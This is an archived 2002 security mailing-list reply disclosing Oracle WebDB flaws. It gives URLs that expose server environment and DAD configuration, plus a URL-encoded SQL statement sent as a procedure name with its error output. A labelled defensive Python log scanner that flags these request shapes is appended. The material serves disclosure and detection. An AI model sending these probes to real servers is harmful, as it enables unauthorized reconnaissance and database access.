Vulnerability Development mailing list archives
Re: Correction - Oracle Apache+WebDB info leakege
From: "Scalise, Marzio" <marzioscalise () KPMG it>
Date: Mon, 4 Feb 2002 17:03:55 +0100
While I was going through the Oracle Apache+WebDB vulnerability, I found something else also interesting. I don't know if anyone has posted this before, but here it goes anyway.

If you request the following:

http://<hostname>:<port>/pls/admin

The following info is displayed:

Sun, 3 Feb 2002 19:57:12 GMT
No DAD configuration Found
DAD name:
PROCEDURE :
URL : http://<hostname>:<port>/pls/admin
PARAMETERS :
===========
ENVIRONMENT:
============
PLSQL_GATEWAY=WebDb
GATEWAY_IVERSION=2
SERVER_SOFTWARE=Apache/1.3.12 (Unix) ApacheJServ/1.1 mod_perl/1.22
[CUT...]

Hi,

Yes, Michal Zalewski has posted this bug.
http://www.securityfocus.com/archive/1/153186

There are 2 bugs for Web DB.

1) You can "view" the DAD configuration on the database server:
http://<host>/pls/<name_of_dad>/admin_/gateway.htm

2) The Oracle WebDB accepts a PL-SQL procedure on the web. For example, if you write in the browser:
http://<hostname>:<port>/pls/<name_of_dad>/select%09*%09from%09cat%01
the following info is displayed:

ORA-06550 row 7
PLS-00428 A INTO clause waited in this instruction ..
(sorry, I have WebDB in Italian and I translate word by word)
PL/SQL: SQL statement ignored

Hope this helps.

Marzio Scalise
Information Risk Management
KPMG S.p.A.
pgp key is available at: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x606359A9
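Added example, not part of the original posts: a check a defender could run over Apache access logs to flag the three request shapes described in this thread. The log lines, the DAD name "demo", the label names and the procedure-name pattern are constructed assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (not from the original posts).
# "demo" is a hypothetical DAD name; addresses are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [03/Feb/2002:19:57:12 +0000] "GET /pls/admin HTTP/1.0" 200 812
192.0.2.10 - - [03/Feb/2002:19:58:01 +0000] "GET /pls/demo/admin_/gateway.htm HTTP/1.0" 200 4096
192.0.2.10 - - [03/Feb/2002:19:59:40 +0000] "GET /pls/demo/select%09*%09from%09cat%01 HTTP/1.0" 200 311
198.51.100.7 - - [03/Feb/2002:20:01:02 +0000] "GET /pls/demo/home.show?p_id=4 HTTP/1.0" 200 2210
198.51.100.7 - - [03/Feb/2002:20:01:05 +0000] "GET /index.html HTTP/1.0" 200 1045
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate call names [schema.][package.]procedure only.
PROC_RE = re.compile(rb"[A-Za-z][A-Za-z0-9_$#]*(?:\.[A-Za-z][A-Za-z0-9_$#]*){0,2}")


def classify(path):
    """Return a finding label for a request path, or None if it looks normal."""
    segs = [s for s in path.split("?", 1)[0].split("/") if s]
    if len(segs) < 2 or segs[0].lower() != "pls":
        return None
    if len(segs) == 2:
        # The first post's request: /pls/admin returned the environment dump.
        return "env-dump-request" if segs[1].lower() == "admin" else None
    if "admin_" in (s.lower() for s in segs[2:]):
        # The reply's item 1: /pls/<name_of_dad>/admin_/gateway.htm
        return "gateway-admin-page"
    # The reply's item 2: decode the procedure segment and require an identifier,
    # so encoded tabs, control bytes, spaces or '*' are flagged.
    if not PROC_RE.fullmatch(unquote_to_bytes(segs[2])):
        return "non-identifier-procedure"
    return None


def scan(log_text):
    """Return (client, path, label) for every flagged request line."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and classify(m.group(1)):
            findings.append((line.split()[0], m.group(1), classify(m.group(1))))
    return findings


if __name__ == "__main__":
    for client, path, label in scan(SAMPLE_LOG):
        print(f"{label:26} {client:15} {path}")
```
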
Current thread:
- Correction - Oracle Apache+WebDB info leakege Leandro Malaquias (Feb 03)
- <Possible follow-ups>
- Re: Correction - Oracle Apache+WebDB info leakege Scalise, Marzio (Feb 04)